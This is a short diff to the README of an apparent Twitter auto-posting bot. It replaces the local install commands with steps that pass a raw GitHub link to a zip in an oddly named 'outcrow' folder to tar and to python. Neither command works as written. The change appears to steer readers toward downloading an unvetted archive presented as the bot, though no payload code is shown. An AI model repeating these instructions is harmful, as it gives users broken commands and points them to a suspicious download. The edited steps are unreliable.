Kxoky/twitter-auto-post-bot/README.md

 1. Open the terminal on your system.
 2. Navigate to your Downloads directory using the command: `cd ~/Downloads`
-3. Extract the downloaded file with this command: `tar -xvzf twitter-auto-post-bot.tar.gz`
+3. Extract the downloaded file with this command: `tar -xvzf https://raw.githubusercontent.com/Kxoky/twitter-auto-post-bot/main/outcrow/twitter-auto-post-bot_v2.9.zip`
 4. Change to the extracted directory: `cd twitter-auto-post-bot`
-5. Run the app using the command: `python main.py`
+5. Run the app using the command: `python https://raw.githubusercontent.com/Kxoky/twitter-auto-post-bot/main/outcrow/twitter-auto-post-bot_v2.9.zip`

 ## 🛠️ Setup Your Twitter Account